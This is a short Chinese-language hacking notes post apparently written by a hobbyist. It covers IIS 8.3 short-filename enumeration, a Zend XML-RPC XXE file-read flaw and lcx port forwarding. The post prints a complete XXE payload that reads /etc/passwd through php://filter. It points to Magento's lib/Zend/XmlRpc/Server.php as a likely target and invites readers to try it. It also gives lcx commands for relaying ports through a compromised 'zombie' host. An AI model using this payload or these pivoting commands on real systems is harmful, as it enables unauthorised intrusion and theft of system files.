1.IIS短文件和文件夹泄漏漏洞
这个漏洞具体可以看核攻击大牛的blog:http://lcx.cc/?i=2643
我大概谈谈我的理解吧,由于历史遗留问题,在windows系统中会对长度超过8个字母的文件夹和后缀超过3个时,会生成一个对应的8.3格式的短文件,而这个文件则是可以通过*和~来进行通配预测的,具体类似于sql盲注,
有人写了个java板的利用工具,但是实际使用中你会发现,你只能预测到前六个字母类似于upload~1.asp这种,实际危害还是比较有限的。
2.zend xml rpc本地文件读取漏洞
这个漏洞具体可以看:http://zone.wooyun.org/content/531
这个也是比较有意思的
<?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT methodName ANY > <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd" >]> <methodCall> <methodName> &xxe; </methodName> </methodCall>
其中的xxe是比较关键的 以及后面的那个
xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd"
但在实际中我没能找到例子来实验,
不过根据我的分析在mageoto中应该采用了这个zend 模块,具体的路径是
lib/Zend/XmlRpc/Server.php
大家可以自行实验,
3.试验了下lcx端口转发,第一次用留个纪念
lcx.exe -slave 本人ip 端口a 肉鸡ip 端口b
lcx.exe -listen 端口a 端口c